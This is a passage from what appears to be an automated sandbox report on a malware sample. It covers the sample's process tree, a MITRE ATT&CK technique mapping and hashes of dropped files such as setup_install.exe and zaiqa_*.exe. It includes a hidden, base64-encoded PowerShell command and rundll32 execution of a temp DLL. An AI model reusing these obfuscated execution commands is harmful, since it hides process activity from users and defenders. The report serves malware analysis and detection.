                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                              PID:2416
                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4328 -ip 4328
                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                PID:400
                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 2060 -ip 2060
                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                  PID:632
                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4292 -ip 4292
                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                    PID:5072
                                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -pss -s 532 -p 1556 -ip 1556
                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                      PID:1152
                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 4292 -ip 4292
                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                        PID:816
                                                                                                                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                          PID:2400
                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 568 -p 5000 -ip 5000
                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                            PID:1488
                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 2060 -ip 2060
                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                              PID:1636
                                                                                                                                                                                                                            • C:\Windows\system32\rundll32.exe
                                                                                                                                                                                                                              rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                              • Process spawned unexpected child process
                                                                                                                                                                                                                              PID:2804
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",global
                                                                                                                                                                                                                                2⤵
                                                                                                                                                                                                                                  PID:5064
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5064 -s 608
                                                                                                                                                                                                                                    3⤵
                                                                                                                                                                                                                                    • Program crash
                                                                                                                                                                                                                                    PID:4676
                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 436 -p 4328 -ip 4328
                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                  PID:4676
                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5064 -ip 5064
                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                    PID:3720
                                                                                                                                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4292 -ip 4292
                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                      PID:2768
                                                                                                                                                                                                                                    • C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                      C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                        PID:1220
                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 4292 -ip 4292
                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                          PID:3208
                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4292 -ip 4292
                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                            PID:5244
                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 5000 -ip 5000
                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                              PID:5308
                                                                                                                                                                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 4328 -ip 4328
                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                PID:5544
                                                                                                                                                                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 5000 -ip 5000
                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                  PID:5572
                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 2060 -ip 2060
                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                    PID:5676
                                                                                                                                                                                                                                                  • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                    C:\Windows\system32\WerFault.exe -pss -s 560 -p 5352 -ip 5352
                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                      PID:6044
                                                                                                                                                                                                                                                    • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                      C:\Windows\system32\WerFault.exe -pss -s 528 -p 5760 -ip 5760
                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                        PID:2472
                                                                                                                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 4328 -ip 4328
                                                                                                                                                                                                                                                        1⤵
                                                                                                                                                                                                                                                          PID:452
                                                                                                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 640 -p 5000 -ip 5000
                                                                                                                                                                                                                                                          1⤵
                                                                                                                                                                                                                                                            PID:1780
                                                                                                                                                                                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 632 -p 2060 -ip 2060
                                                                                                                                                                                                                                                            1⤵
                                                                                                                                                                                                                                                              PID:4700
                                                                                                                                                                                                                                                            • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                              C:\Windows\system32\WerFault.exe -pss -s 648 -p 6084 -ip 6084
                                                                                                                                                                                                                                                              1⤵
                                                                                                                                                                                                                                                                PID:5984
                                                                                                                                                                                                                                                              • C:\Windows\system32\WerFault.exe
                                                                                                                                                                                                                                                                C:\Windows\system32\WerFault.exe -pss -s 640 -p 2844 -ip 2844
                                                                                                                                                                                                                                                                1⤵
                                                                                                                                                                                                                                                                  PID:5480
                                                                                                                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 4328 -ip 4328
                                                                                                                                                                                                                                                                  1⤵
                                                                                                                                                                                                                                                                    PID:1492
                                                                                                                                                                                                                                                                  • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
                                                                                                                                                                                                                                                                    C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
                                                                                                                                                                                                                                                                    1⤵
                                                                                                                                                                                                                                                                      PID:5612
                                                                                                                                                                                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 668 -p 4328 -ip 4328
                                                                                                                                                                                                                                                                      1⤵
                                                                                                                                                                                                                                                                        PID:5600

                                                                                                                                                                                                                                                                      Network

                                                                                                                                                                                                                                                                      MITRE ATT&CK Matrix ATT&CK v6

                                                                                                                                                                                                                                                                      Execution

                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                      Persistence

                                                                                                                                                                                                                                                                      Modify Existing Service

                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                      T1031

                                                                                                                                                                                                                                                                      New Service

                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                      T1050

                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                      Privilege Escalation

                                                                                                                                                                                                                                                                      New Service

                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                      T1050

                                                                                                                                                                                                                                                                      Scheduled Task

                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                      T1053

                                                                                                                                                                                                                                                                      Defense Evasion

                                                                                                                                                                                                                                                                      Modify Registry

                                                                                                                                                                                                                                                                      2
                                                                                                                                                                                                                                                                      T1112

                                                                                                                                                                                                                                                                      Disabling Security Tools

                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                      T1089

                                                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                                                      Install Root Certificate

                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                      T1130

                                                                                                                                                                                                                                                                      Credential Access

                                                                                                                                                                                                                                                                      Credentials in Files

                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                      T1081

                                                                                                                                                                                                                                                                      Discovery

                                                                                                                                                                                                                                                                      Query Registry

                                                                                                                                                                                                                                                                      4
                                                                                                                                                                                                                                                                      T1012

                                                                                                                                                                                                                                                                      Virtualization/Sandbox Evasion

                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                      T1497

                                                                                                                                                                                                                                                                      System Information Discovery

                                                                                                                                                                                                                                                                      5
                                                                                                                                                                                                                                                                      T1082

                                                                                                                                                                                                                                                                      Peripheral Device Discovery

                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                      T1120

                                                                                                                                                                                                                                                                      Collection

                                                                                                                                                                                                                                                                      Data from Local System

                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                      T1005

                                                                                                                                                                                                                                                                      Command and Control

                                                                                                                                                                                                                                                                      Web Service

                                                                                                                                                                                                                                                                      1
                                                                                                                                                                                                                                                                      T1102

                                                                                                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                                                                                                      Downloads

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        54e9306f95f32e50ccd58af19753d929

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        eab9457321f34d4dcf7d4a0ac83edc9131bf7c57

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        45f94dceb18a8f738a26da09ce4558995a4fe02b971882e8116fc9b59813bb72

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        8711a4d866f21cdf4d4e6131ec4cfaf6821d0d22b90946be8b5a09ab868af0270a89bc326f03b858f0361a83c11a1531b894dfd1945e4812ba429a7558791f4f

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        405b915eb480979f0901e10710e6033e

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        b8ea3dc238845f447aa657622a522ecff296e39f

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        fce8d7ee0e35c18ffccd38c9ac494d91ab065f7f69dd6e6e2f20d30f924be98a

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        bed18642bb2c3baf9ba0475825158b83eda11298103645963e882f3278792be5faa06ae4c0d037f557a2aa111058797ff64fd56f7f502d8964925457f115598c

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\zaiqa_4.exe.log
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        e5352797047ad2c91b83e933b24fbc4f

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        9bf8ac99b6cbf7ce86ce69524c25e3df75b4d772

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        b4643874d42d232c55bfbb75c36da41809d0c9ba4b2a203049aa82950345325c

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        dd2fc1966c8b3c9511f14801d1ce8110d6bca276a58216b5eeb0a3cfbb0cc8137ea14efbf790e63736230141da456cbaaa4e5c66f2884d4cfe68f499476fd827

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\libcurl.dll
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\libcurl.dll
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\libcurl.dll
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        d09be1f47fd6b827c81a4812b4f7296f

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        028ae3596c0790e6d7f9f2f3c8e9591527d267f7

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        0de53e7be51789adaec5294346220b20f793e7f8d153a3c110a92d658760697e

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        857f44a1383c29208509b8f1164b6438d750d5bb4419add7626986333433e67a0d1211ec240ce9472f30a1f32b16c8097aceba4b2255641b3d8928f94237f595

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\libcurlpp.dll
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\libcurlpp.dll
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        e6e578373c2e416289a8da55f1dc5e8e

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        b601a229b66ec3d19c2369b36216c6f6eb1c063e

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        43e86d650a68f1f91fa2f4375aff2720e934aa78fa3d33e06363122bf5a9535f

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        9df6a8c418113a77051f6cb02745ad48c521c13cdadb85e0e37f79e29041464c8c7d7ba8c558fdd877035eb8475b6f93e7fc62b38504ddfe696a61480cabac89

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\libgcc_s_dw2-1.dll
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        9aec524b616618b0d3d00b27b6f51da1

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        64264300801a353db324d11738ffed876550e1d3

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        59a466f77584438fc3abc0f43edc0fc99d41851726827a008841f05cfe12da7e

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        0648a26940e8f4aad73b05ad53e43316dd688e5d55e293cce88267b2b8744412be2e0d507dadad830776bf715bcd819f00f5d1f7ac1c5f1c4f682fb7457a20d0

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\libstdc++-6.dll
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\libstdc++-6.dll
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        5e279950775baae5fea04d2cc4526bcc

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        8aef1e10031c3629512c43dd8b0b5d9060878453

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        97de47068327bb822b33c7106f9cbb489480901a6749513ef5c31d229dcaca87

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        666325e9ed71da4955058aea31b91e2e848be43211e511865f393b7f537c208c6b31c182f7d728c2704e9fc87e7d1be3f98f5fee4d34f11c56764e1c599afd02

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\libwinpthread-1.dll
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\libwinpthread-1.dll
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        1e0d62c34ff2e649ebc5c372065732ee

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        fcfaa36ba456159b26140a43e80fbd7e9d9af2de

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        509cb1d1443b623a02562ac760bced540e327c65157ffa938a22f75e38155723

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        3653f8ed8ad3476632f731a3e76c6aae97898e4bf14f70007c93e53bc443906835be29f861c4a123db5b11e0f3dd5013b2b3833469a062060825df9ee708dc61

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\setup_install.exe
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        0a9fc02c0506ca3c149381afca7cfbbd

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        751a282f62c4822e523f1d31de90a4b30e6ad480

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        f559cc7ee33d750040269819f1531104c80648e3529fb7b5a740ab91ea861389

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        ae84a822532cb24e07af21e406f45d5dd61a18e757fa5c5eb7b8917dc2e3d2fecf18403c4c940bfd39018c36b2e38de06e7aaeb8e257abe1afe4ec22fefb226f

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\setup_install.exe
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        0a9fc02c0506ca3c149381afca7cfbbd

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        751a282f62c4822e523f1d31de90a4b30e6ad480

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        f559cc7ee33d750040269819f1531104c80648e3529fb7b5a740ab91ea861389

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        ae84a822532cb24e07af21e406f45d5dd61a18e757fa5c5eb7b8917dc2e3d2fecf18403c4c940bfd39018c36b2e38de06e7aaeb8e257abe1afe4ec22fefb226f

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_1.exe
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        3263859df4866bf393d46f06f331a08f

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        5b4665de13c9727a502f4d11afb800b075929d6c

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_1.exe
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        3263859df4866bf393d46f06f331a08f

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        5b4665de13c9727a502f4d11afb800b075929d6c

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_1.txt
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        3263859df4866bf393d46f06f331a08f

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        5b4665de13c9727a502f4d11afb800b075929d6c

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        9dcacda3913e30cafd92c909648b5bffde14b8e39e6adbfb15628006c0d4d3c2

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        58205110a017f5d73dd131fefb1e3bbbcc670ed0c645aeefebe5281579c7b1dceffa56671cd7b186554bdb81710e21018ed0d7088a27517dfc5e48d6d3578cf6

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_2.exe
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        c9cace962407521df135e7007fbad971

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        5a5e4ff24dea77b651aad1e23540be7a7bec3d7c

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        a52c2ec17054cc4f06d55a7746e4005506fa23e2f9754f0180082ccd895e084a

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        d27947d70ac4b12dc5b4946938de93a53d1be150f1bee83385d0d662f924b96444fbd718296ee1180c32c0e3acc812de2aa703e592771b5dc50e126bb5d1b519

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_2.txt
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        c9cace962407521df135e7007fbad971

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        5a5e4ff24dea77b651aad1e23540be7a7bec3d7c

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        a52c2ec17054cc4f06d55a7746e4005506fa23e2f9754f0180082ccd895e084a

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        d27947d70ac4b12dc5b4946938de93a53d1be150f1bee83385d0d662f924b96444fbd718296ee1180c32c0e3acc812de2aa703e592771b5dc50e126bb5d1b519

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_3.exe
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        fb757aa597ecb5ef9319def162334769

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        1eab2c8485d2eb80d9f5046fd9615820d43405c9

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        73d7d380546cbe1de046597822b9ed925648ae855b3d0bbeb392e124e38e46ea

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        6caac5d8a0af7162589fe6612b17c668cf5daeb8fcbf5c172e8bf6cc1e899f3b0d46265203a869bbc21d274fe55631414abb03c0d32a580f8ee297040e542872

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_3.txt
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        fb757aa597ecb5ef9319def162334769

                                                                                                                                                                                                                                                                        SHA1

                                                                                                                                                                                                                                                                        1eab2c8485d2eb80d9f5046fd9615820d43405c9

                                                                                                                                                                                                                                                                        SHA256

                                                                                                                                                                                                                                                                        73d7d380546cbe1de046597822b9ed925648ae855b3d0bbeb392e124e38e46ea

                                                                                                                                                                                                                                                                        SHA512

                                                                                                                                                                                                                                                                        6caac5d8a0af7162589fe6612b17c668cf5daeb8fcbf5c172e8bf6cc1e899f3b0d46265203a869bbc21d274fe55631414abb03c0d32a580f8ee297040e542872

                                                                                                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8492D81D\zaiqa_4.exe
                                                                                                                                                                                                                                                                        MD5

                                                                                                                                                                                                                                                                        6e59f2a87fd87c5d5eda76c81cb1b4dd

